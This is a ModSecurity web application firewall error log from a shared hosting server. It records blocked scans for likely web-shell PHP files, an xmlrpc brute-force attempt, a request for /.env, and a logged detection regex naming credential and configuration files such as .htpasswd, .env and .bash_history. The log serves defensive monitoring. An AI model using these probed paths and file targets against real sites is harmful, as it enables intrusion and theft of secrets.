[Tue May 26 16:51:25.322588 2026] [security2:error] [pid 823496:tid 823699] [client 20.206.111.203:6045] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWCNZa08mrtyBNpA4PkswAAAEc"]
[Tue May 26 16:51:25.435862 2026] [security2:error] [pid 823496:tid 823717] [client 85.11.167.19:42714] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "azurmediatec.com"] [uri "/"] [unique_id "ahWCNZa08mrtyBNpA4PktQAAAFk"]
[Tue May 26 16:51:25.762376 2026] [security2:error] [pid 823496:tid 823638] [client 20.206.111.203:6121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWCNZa08mrtyBNpA4PkuAAAAAo"]
[Tue May 26 16:51:25.762485 2026] [security2:error] [pid 823496:tid 823638] [client 20.206.111.203:6121] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWCNZa08mrtyBNpA4PkuAAAAAo"]
[Tue May 26 16:51:26.046833 2026] [security2:error] [pid 823496:tid 823698] [client 117.198.37.168:55759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCNZa08mrtyBNpA4PkugAAAEY"]
[Tue May 26 16:51:26.047012 2026] [security2:error] [pid 823496:tid 823698] [client 117.198.37.168:55759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCNZa08mrtyBNpA4PkugAAAEY"]
[Tue May 26 16:51:26.134992 2026] [security2:error] [pid 817651:tid 817869] [client 20.206.111.203:6047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/css/"] [unique_id "ahWCNtlGRCPPN1dS2y3B9QAAAN0"]
[Tue May 26 16:51:26.316330 2026] [security2:error] [pid 823496:tid 823639] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCNpa08mrtyBNpA4PkwQAAAAs"]
[Tue May 26 16:51:26.494431 2026] [security2:error] [pid 817651:tid 817870] [client 20.206.111.203:6047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/x/"] [unique_id "ahWCNtlGRCPPN1dS2y3B9wAAAN4"]
[Tue May 26 16:51:26.685328 2026] [security2:error] [pid 823496:tid 823725] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCNpa08mrtyBNpA4PkxgAAAGE"]
[Tue May 26 16:51:26.859393 2026] [security2:error] [pid 817651:tid 817883] [client 77.83.39.197:56754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env"] [unique_id "ahWCNtlGRCPPN1dS2y3B_wAAAOs"]
[Tue May 26 16:51:26.864494 2026] [security2:error] [pid 817651:tid 817806] [client 20.206.111.203:6047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWCNtlGRCPPN1dS2y3CAAAAAJ4"]
[Tue May 26 16:51:27.048386 2026] [security2:error] [pid 823496:tid 823671] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCN5a08mrtyBNpA4PkzgAAACs"]
[Tue May 26 16:51:27.232554 2026] [security2:error] [pid 817651:tid 817861] [client 20.206.111.203:6047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWCN9lGRCPPN1dS2y3CAQAAANU"]
[Tue May 26 16:51:27.232708 2026] [security2:error] [pid 817651:tid 817861] [client 20.206.111.203:6047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWCN9lGRCPPN1dS2y3CAQAAANU"]
[Tue May 26 16:51:27.555031 2026] [security2:error] [pid 823496:tid 823653] [client 51.68.247.221:20004] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "avprealty.com"] [uri "/robots.txt"] [unique_id "ahWCN5a08mrtyBNpA4Pk1AAAABk"]
[Tue May 26 16:51:27.555227 2026] [security2:error] [pid 823496:tid 823653] [client 51.68.247.221:20004] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "avprealty.com"] [uri "/robots.txt"] [unique_id "ahWCN5a08mrtyBNpA4Pk1AAAABk"]
[Tue May 26 16:51:27.596051 2026] [security2:error] [pid 823496:tid 823665] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCNpa08mrtyBNpA4PkwwAAACU"]
[Tue May 26 16:51:27.605210 2026] [security2:error] [pid 823496:tid 823645] [client 20.206.111.203:6120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWCN5a08mrtyBNpA4Pk1QAAABE"]
[Tue May 26 16:51:27.605323 2026] [security2:error] [pid 823496:tid 823645] [client 20.206.111.203:6120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWCN5a08mrtyBNpA4Pk1QAAABE"]
[Tue May 26 16:51:27.962963 2026] [security2:error] [pid 817651:tid 817882] [client 20.206.111.203:6060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWCN9lGRCPPN1dS2y3CCQAAAOo"]
[Tue May 26 16:51:27.963131 2026] [security2:error] [pid 817651:tid 817882] [client 20.206.111.203:6060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWCN9lGRCPPN1dS2y3CCQAAAOo"]
[Tue May 26 16:51:28.339703 2026] [security2:error] [pid 823496:tid 823722] [client 20.206.111.203:6124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWCOJa08mrtyBNpA4Pk4QAAAF4"]
[Tue May 26 16:51:28.339823 2026] [security2:error] [pid 823496:tid 823722] [client 20.206.111.203:6124] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWCOJa08mrtyBNpA4Pk4QAAAF4"]
[Tue May 26 16:51:28.710538 2026] [security2:error] [pid 817651:tid 817850] [client 20.206.111.203:6095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWCONlGRCPPN1dS2y3CDwAAAMo"]
[Tue May 26 16:51:28.710684 2026] [security2:error] [pid 817651:tid 817850] [client 20.206.111.203:6095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWCONlGRCPPN1dS2y3CDwAAAMo"]
[Tue May 26 16:51:28.903368 2026] [security2:error] [pid 817651:tid 817795] [client 142.44.228.52:29840] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "avprealty.com"] [uri "/"] [unique_id "ahWCONlGRCPPN1dS2y3CFAAAAJM"]
[Tue May 26 16:51:28.903497 2026] [security2:error] [pid 817651:tid 817795] [client 142.44.228.52:29840] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "avprealty.com"] [uri "/"] [unique_id "ahWCONlGRCPPN1dS2y3CFAAAAJM"]
[Tue May 26 16:51:29.097717 2026] [security2:error] [pid 823496:tid 823721] [client 20.206.111.203:6020] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/details/"] [unique_id "ahWCOZa08mrtyBNpA4Pk7AAAAF0"]
[Tue May 26 16:51:29.114239 2026] [security2:error] [pid 823496:tid 823691] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCN5a08mrtyBNpA4Pk2gAAAD8"]
[Tue May 26 16:51:29.277020 2026] [security2:error] [pid 823496:tid 823753] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCOZa08mrtyBNpA4Pk7gAAAH0"]
[Tue May 26 16:51:29.466450 2026] [security2:error] [pid 823496:tid 823736] [client 20.206.111.203:6020] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahWCOZa08mrtyBNpA4Pk9gAAAGw"]
[Tue May 26 16:51:29.659305 2026] [security2:error] [pid 823496:tid 823664] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCOZa08mrtyBNpA4Pk-wAAACQ"]
[Tue May 26 16:51:29.841714 2026] [security2:error] [pid 823496:tid 823643] [client 20.206.111.203:6020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWCOZa08mrtyBNpA4Pk_wAAAA8"]
[Tue May 26 16:51:29.841814 2026] [security2:error] [pid 823496:tid 823643] [client 20.206.111.203:6020] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWCOZa08mrtyBNpA4Pk_wAAAA8"]
[Tue May 26 16:51:30.264819 2026] [security2:error] [pid 817651:tid 817889] [client 20.206.111.203:6044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWCOtlGRCPPN1dS2y3CJwAAAPE"]
[Tue May 26 16:51:30.264940 2026] [security2:error] [pid 817651:tid 817889] [client 20.206.111.203:6044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWCOtlGRCPPN1dS2y3CJwAAAPE"]
[Tue May 26 16:51:30.584895 2026] [security2:error] [pid 823496:tid 823733] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCOZa08mrtyBNpA4Pk8QAAAGk"]
[Tue May 26 16:51:30.639549 2026] [security2:error] [pid 817651:tid 817891] [client 20.206.111.203:6140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahWCOtlGRCPPN1dS2y3CLgAAAPM"]
[Tue May 26 16:51:30.818375 2026] [security2:error] [pid 823496:tid 823653] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCOpa08mrtyBNpA4PlBQAAABk"]
[Tue May 26 16:51:31.000612 2026] [security2:error] [pid 817651:tid 817887] [client 20.206.111.203:6140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWCOtlGRCPPN1dS2y3CNAAAAO8"]
[Tue May 26 16:51:31.000728 2026] [security2:error] [pid 817651:tid 817887] [client 20.206.111.203:6140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWCOtlGRCPPN1dS2y3CNAAAAO8"]
[Tue May 26 16:51:31.386756 2026] [security2:error] [pid 817651:tid 817898] [client 20.206.111.203:6143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWCO9lGRCPPN1dS2y3COAAAAPo"]
[Tue May 26 16:51:31.386875 2026] [security2:error] [pid 817651:tid 817898] [client 20.206.111.203:6143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWCO9lGRCPPN1dS2y3COAAAAPo"]
[Tue May 26 16:51:31.797296 2026] [security2:error] [pid 823496:tid 823674] [client 20.206.111.203:6118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWCO5a08mrtyBNpA4PlDQAAAC4"]
[Tue May 26 16:51:31.797442 2026] [security2:error] [pid 823496:tid 823674] [client 20.206.111.203:6118] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWCO5a08mrtyBNpA4PlDQAAAC4"]
[Tue May 26 16:51:32.269034 2026] [security2:error] [pid 823496:tid 823634] [client 20.206.111.203:6083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWCPJa08mrtyBNpA4PlFQAAAAY"]
[Tue May 26 16:51:32.269141 2026] [security2:error] [pid 823496:tid 823634] [client 20.206.111.203:6083] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWCPJa08mrtyBNpA4PlFQAAAAY"]
[Tue May 26 16:51:32.625203 2026] [security2:error] [pid 823496:tid 823648] [client 20.206.111.203:5975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahWCPJa08mrtyBNpA4PlGgAAABQ"]
[Tue May 26 16:51:32.625393 2026] [security2:error] [pid 823496:tid 823648] [client 20.206.111.203:5975] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahWCPJa08mrtyBNpA4PlGgAAABQ"]
[Tue May 26 16:51:33.009846 2026] [security2:error] [pid 817651:tid 817877] [client 20.206.111.203:6087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahWCPdlGRCPPN1dS2y3CSAAAAOU"]
[Tue May 26 16:51:33.009957 2026] [security2:error] [pid 817651:tid 817877] [client 20.206.111.203:6087] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahWCPdlGRCPPN1dS2y3CSAAAAOU"]
[Tue May 26 16:51:33.179311 2026] [security2:error] [pid 817651:tid 817798] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCO9lGRCPPN1dS2y3CPgAAAJY"]
[Tue May 26 16:51:33.391035 2026] [security2:error] [pid 823496:tid 823726] [client 20.206.111.203:6049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWCPZa08mrtyBNpA4PlIAAAAGI"]
[Tue May 26 16:51:33.391144 2026] [security2:error] [pid 823496:tid 823726] [client 20.206.111.203:6049] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWCPZa08mrtyBNpA4PlIAAAAGI"]
[Tue May 26 16:51:33.764612 2026] [security2:error] [pid 823496:tid 823707] [client 20.206.111.203:6080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWCPZa08mrtyBNpA4PlJQAAAE8"]
[Tue May 26 16:51:33.764728 2026] [security2:error] [pid 823496:tid 823707] [client 20.206.111.203:6080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWCPZa08mrtyBNpA4PlJQAAAE8"]
[Tue May 26 16:51:34.124194 2026] [security2:error] [pid 823496:tid 823632] [client 20.206.111.203:6088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahWCPpa08mrtyBNpA4PlLwAAAAQ"]
[Tue May 26 16:51:34.124305 2026] [security2:error] [pid 823496:tid 823632] [client 20.206.111.203:6088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahWCPpa08mrtyBNpA4PlLwAAAAQ"]
[Tue May 26 16:51:34.552280 2026] [security2:error] [pid 823496:tid 823684] [client 20.206.111.203:6021] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/wp-includes/Requests/"] [unique_id "ahWCPpa08mrtyBNpA4PlNQAAADg"]
[Tue May 26 16:51:34.739309 2026] [security2:error] [pid 823496:tid 823724] [client 20.206.111.203:6081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCPpa08mrtyBNpA4PlOQAAAGA"]
